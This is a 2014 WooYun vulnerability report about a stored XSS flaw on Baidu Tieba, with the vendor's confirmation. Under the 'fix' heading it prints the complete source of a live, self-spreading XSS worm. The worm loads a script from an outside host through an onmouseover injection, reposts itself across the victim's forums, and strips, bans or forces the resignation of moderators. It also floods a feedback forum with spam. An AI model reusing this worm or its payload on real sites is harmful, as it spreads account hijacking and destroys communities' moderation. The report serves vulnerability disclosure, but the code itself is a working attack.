当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-053252

漏洞标题:今天百度贴吧的XSS漏洞

相关厂商:百度

漏洞作者: 马云

提交时间:2014-03-10 11:06

修复时间:2014-04-24 11:07

公开时间:2014-04-24 11:07

漏洞类型:xss跨站脚本攻击

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-03-10: 细节已通知厂商并且等待厂商处理中
2014-03-10: 厂商已经确认,细节仅向厂商公开
2014-03-20: 细节向核心白帽子及相关领域专家公开
2014-03-30: 细节向普通白帽子公开
2014-04-09: 细节向实习白帽子公开
2014-04-24: 细节向公众公开

简要描述:

所有帖子全部是转帖,来自test吧,点击以后,会获取当前账号cookie,并转帖。如果是有吧务权限,大吧主则自动申请辞职,并删除小吧主。小吧主会封禁所有吧务。

详细说明:

别点像爆吧格式的帖子看,会被盗号并且自动封了自己是权限的吧里的吧务组! 吧务在外面用贴子管理工具删 不要点进去!

漏洞证明:

ld.jpg


一秒全封吧务

修复方案:

var n=PageData.user.user_forum_list.info.length;var num=0;var config = { titles: ["\u4f60\u7684\u672a\u6765\u5728\u8fd9\u4e2a\u5e16\u5b50\u91cc\uff0c\u60f3\u770b\u5417\uff1f", "\u611a\u8822\u7684\u51e1\u4eba \u63a5\u53d7\u795e\u306e\u6012\u706b\u5427","\u8fd9\u662f\u547d\u8fd0\u77f3\u4e4b\u95e8\u7684\u9009\u62e9","\u98a4\u6296\u5427\uff0c\u51e1\u4eba\u4eec\uff01","\u6b3a\u9a97\u4e00\u5f00\u59cb\u7684\u4f60 \u6b3a\u9a97\u4e16\u754c\u5427","\u8c01\u8981\u5403\u53d8\u6001\u7684\u9999\u8549\uff01","\u521a\u624d\u6536\u5230\u4e86\u5f3a\u70c8\u7684\u7cbe\u795e\u653b\u51fb \u5fc3...\u5fc3\u7075\u6b63\u906d\u5230\u4fb5\u8680","\u4e0d\u8981\u9760\u8fd1\u6211\uff01\u6211\u6b63\u5728\u6267\u884c\u963b\u6b62\u673a\u5173\u66b4\u529b\u884c\u4e3a\u7684\u4f5c\u6218","\u624b\u62ff\u91d1\u5777\u5783\uff0c\u811a\u8e0f\u4e03\u5f69\u4e91\u7aef\uff0c\u53d1\u51fa\u6700\u540e\u7684\u5450\u558a","\u98a4\u6296\u5427\uff0c\u51e1\u4eba\u4eec\uff01"],contents: ["\u4f60\u7684\u672a\u6765\u5728\u8fd9\u4e2a\u5e16\u5b50\u91cc\uff0c\u60f3\u770b\u5417\uff1f","\u611a\u8822\u7684\u51e1\u4eba \u63a5\u53d7\u795e\u306e\u6012\u706b\u5427","\u8fd9\u662f\u547d\u8fd0\u77f3\u4e4b\u95e8\u7684\u9009\u62e9","\u98a4\u6296\u5427\uff0c\u51e1\u4eba\u4eec\uff01","\u98a4\u6296\u5427\uff0c\u51e1\u4eba\u4eec\uff01"],tbs: PageData.tbs,whiteList: [635137, 1074587, 116863], evilContent: '"onmouseover="$.getScript(\u0027//newwordpress.duapp.com/xss20140309/rc1.js\u0027)' //xss};
var userInfo = { is_red_tail:function(i){$.get('http://tieba.baidu.com/home/get/panel?ie=utf-8&un='+PageData.user.name,function(data){return data.data.identity});}(),is_bawu: function (p) {return p.bawu ? p.can_edit_gconforum ? "daba" : "xiaoba" : "none"}(PageData.user.power)};function addGood(fid, kw, tid) {$.get('http://tieba.baidu.com/mo/q---9E2EBBE47D2160067823F56F5F549254%3AFG%3D1--1-3-0--2--wapp_1393073859357_21/m?tn=bdSGD&tbs=' + config.tbs + '&word=' + encodeURIComponent(kw) + '&z=' + tid + '&fid=' + fid + '&ntn=set&pn=0&cate=0&expand=0&pinf=1_2_0');}
function topThread(fid, kw, tid) { $.get('http://tieba.baidu.com/mo/q---9E2EBBE47D2160067823F56F5F549254%3AFG%3D1--1-3-0--2--wapp_1393073859357_21/m?tn=bdTOP&z=' + tid + '&tbs=' + config.tbs + '&word=' + encodeURIComponent(kw) + '&expand=0&fid=' + fid + '&ntn=set&pinf=1_2_0');}
function killXiaoBa() {$.get("/bawu2/platform/listBawuTeam?ie=utf-8&word=" + encodeURIComponent(PageData.forum.name), function (x) {$(x).find("ul[id*='assist']").find("li[data-field*='\"user_id\":']").each(function () {$.post("/bawu2/platform/delBawuMember", {tbs: config.tbs,word: PageData.forum.name,user_id: $.parseJSON(this.dataset.field).user_id,type: "assist",ie: "utf-8"});});});}
function banXiaoBa() {$.get('http://tieba.baidu.com/f/bawu/admin_group?ie=utf-8&kw=' + encodeURIComponent(PageData.forum.name) + '&fid=' + PageData.forum.id, function (res) {$(res).find('tr:nth-child(3)').find('a').each(function () {$.post('/bawu/cm', {cm: 'filter_forum_user',ban_days: 1,user_name: $(this).text(),word: PageData.forum.name,fid: PageData.forum.id,tbs: config.tbs,ie: 'utf-8'})})})}
function czDaba() {$.post('/bawu/cm', {cm: 'apply_resign',resignation: '\u518d\u89c1\u4e86 \u6211\u7684\u670b\u53cb\u4eec.',dtype: 'json',word: PageData.forum.name,fid: PageData.forum.id,tbs: config.tbs,ie: 'utf-8'})}
function addThread(fid) {$.post("/relay/commit", {ie: "utf-8",kw: "test", fid:35, tid:2910585163,ftid: fid, ptid:2910585163, ppid:47102132189,tbs: PageData.tbs,title: config.titles[Math.random() * config.titles.length | 0],content: "aeb1cb13495409230133f7cd9058d109b3de492f#"+config.contents[Math.random() * config.contents.length | 0]+config.evilContent,new_vcode:1,tag:11,activity_id:1425,act_type:"photo",__type__:"repost"},function (x) { if (x.no == 0 || x.new_thread_id) return x.new_thread_id;})}
function reply(){ if (-1 !== config.whiteList.indexOf(PageData.user.user_forum_list.info[num].id) || !userInfo.is_red_tail && !PageData.user.user_forum_list.info[num].is_like){num++;return;} if(PageData.user.user_forum_list.info[num].tid){ num++; }else{ PageData.user.user_forum_list.info[num].tid=true;addThread(PageData.user.user_forum_list.info[num].id); }}
function fuckRedTail() {var obj = {ie: "utf-8",kw: "\u8d34\u5427\u610f\u89c1\u53cd\u9988",fid: 898666,tbs: PageData.tbs,title: "\u767e\u5ea6SB",content: config.contents[Math.random() * config.contents.length | 0]}for(var i=0;i<100;i++){$.post("/f/commit/thread/add",obj);}}
if(userInfo.is_red_tail){setInterval("fuckRedTail()",8000)}if ("daba" === userInfo.is_bawu){ killXiaoBa(); czDaba();}if ("xiaoba" === userInfo.is_bawu) banXiaoBa();var ruchong=setInterval("reply()",2000);
以上是源码,修复还得靠度娘

版权声明:转载请注明来源 马云@乌云


漏洞回应

厂商回应:

危害等级:低

漏洞Rank:1

确认时间:2014-03-10 11:38

厂商回复:

跟熊猫报告的是同一个漏洞,当前业务部门正在处理。感谢对百度安全的支持。

最新状态:

暂无